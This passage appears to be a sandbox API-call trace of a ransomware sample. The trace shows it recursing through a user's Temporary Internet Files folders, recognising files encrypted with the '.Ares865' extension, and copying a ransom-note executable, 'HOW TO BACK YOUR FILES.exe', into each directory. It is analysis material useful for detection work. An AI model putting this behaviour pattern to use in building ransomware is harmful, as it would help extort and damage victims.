0x33cfb0 [0110.839] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.839] CloseHandle (hObject=0x120) returned 1 [0110.839] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.839] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x69df8280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x69df8280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.840] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.840] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.840] lstrcpyW (in: lpString1=0x2cce48a, lpString2="Content.IE5" | out: lpString1="Content.IE5") returned="Content.IE5" [0110.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0110.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa2) returned 0x324fc8 [0110.840] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0110.840] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x2dbf3370, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d6931a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content.MSO", cAlternateFileName="")) returned 1 [0110.840] lstrcmpiW (lpString1="Content.MSO", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.840] lstrcmpiW (lpString1="Content.MSO", lpString2="aoldtz.exe") returned 1 [0110.840] lstrcpyW (in: lpString1=0x2cce48a, lpString2="Content.MSO" | out: lpString1="Content.MSO") returned="Content.MSO" [0110.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0110.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa2) returned 0x325078 [0110.841] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0110.841] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe7138400, ftCreationTime.dwHighDateTime=0x1d2e625, ftLastAccessTime.dwLowDateTime=0x4d66d040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d66d040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content.Word", cAlternateFileName="CONTEN~1.WOR")) returned 1 [0110.841] lstrcmpiW (lpString1="Content.Word", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.841] lstrcmpiW (lpString1="Content.Word", lpString2="aoldtz.exe") returned 1 [0110.841] lstrcpyW (in: lpString1=0x2cce48a, lpString2="Content.Word" | out: lpString1="Content.Word") returned="Content.Word" [0110.841] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0110.841] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa4) returned 0x325128 [0110.841] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0110.841] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28ea2560, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28ea2560, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x69df8280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x350, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="DESKTO~1.ARE")) returned 1 [0110.841] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.841] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0110.841] lstrcpyW (in: lpString1=0x2cce48a, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0110.841] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0110.841] lstrlenW (lpString="Ares865") returned 7 [0110.841] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.841] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d47de60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d47de60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0110.841] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0110.841] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x69e1e3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x69e1e3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0110.841] lstrcmpiW (lpString1="Low", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.841] lstrcmpiW (lpString1="Low", lpString2="aoldtz.exe") returned 1 [0110.842] lstrcpyW (in: lpString1=0x2cce48a, lpString2="Low" | out: lpString1="Low") returned="Low" [0110.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0110.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x92) returned 0x334fc8 [0110.842] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0110.842] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d47de60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d47de60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Virtualized", cAlternateFileName="VIRTUA~1")) returned 1 [0110.842] lstrcmpiW (lpString1="Virtualized", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.842] lstrcmpiW (lpString1="Virtualized", lpString2="aoldtz.exe") returned 1 [0110.842] lstrcpyW (in: lpString1=0x2cce48a, lpString2="Virtualized" | out: lpString1="Virtualized") returned="Virtualized" [0110.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0110.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa2) returned 0x3251d8 [0110.842] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0110.842] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d47de60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d47de60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Virtualized", cAlternateFileName="VIRTUA~1")) returned 0 [0110.842] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.842] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0110.842] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized" [0110.842] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized" [0110.842] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.842] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.843] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.843] GetLastError () returned 0x0 [0110.844] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.844] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.844] CloseHandle (hObject=0x120) returned 1 [0110.844] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.844] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d47de60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d47de60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.844] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.844] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.844] lstrcpyW (in: lpString1=0x2cce4a2, lpString2="C" | out: lpString1="C") returned="C" [0110.844] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0110.844] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x3251d8 [0110.844] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0110.844] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d47de60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d47de60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0110.844] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0110.844] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d47de60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d47de60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0110.844] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.845] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0110.845] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C" [0110.845] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C" [0110.845] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.845] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\virtualized\\c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.846] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.846] GetLastError () returned 0x0 [0110.846] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.846] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.846] CloseHandle (hObject=0x120) returned 1 [0110.846] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.846] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f82a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4d47de60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d47de60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.847] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.847] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.847] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="Users" | out: lpString1="Users") returned="Users" [0110.847] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0110.847] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb2) returned 0x2f2fc8 [0110.847] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0110.847] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f82a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4d4a3fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d4a3fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0110.847] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.847] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0110.847] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users" [0110.847] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users" [0110.847] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.847] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\virtualized\\c\\users\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.848] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.848] GetLastError () returned 0x0 [0110.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.848] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.848] CloseHandle (hObject=0x120) returned 1 [0110.849] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.849] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f82a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4d4a3fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d4a3fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.849] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.849] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.849] lstrcpyW (in: lpString1=0x2cce4b2, lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0110.849] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0110.849] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xdc) returned 0x338fc8 [0110.849] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0110.849] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d4a3fc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d4a3fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0110.849] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0110.849] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d4a3fc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d4a3fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0110.849] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.849] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0110.849] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz" [0110.850] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz" [0110.850] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.850] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\virtualized\\c\\users\\5p5nrgjn0js halpmcxz\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.850] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.851] GetLastError () returned 0x0 [0110.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.851] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.851] CloseHandle (hObject=0x120) returned 1 [0110.851] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.851] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x2cce1b0 | out: 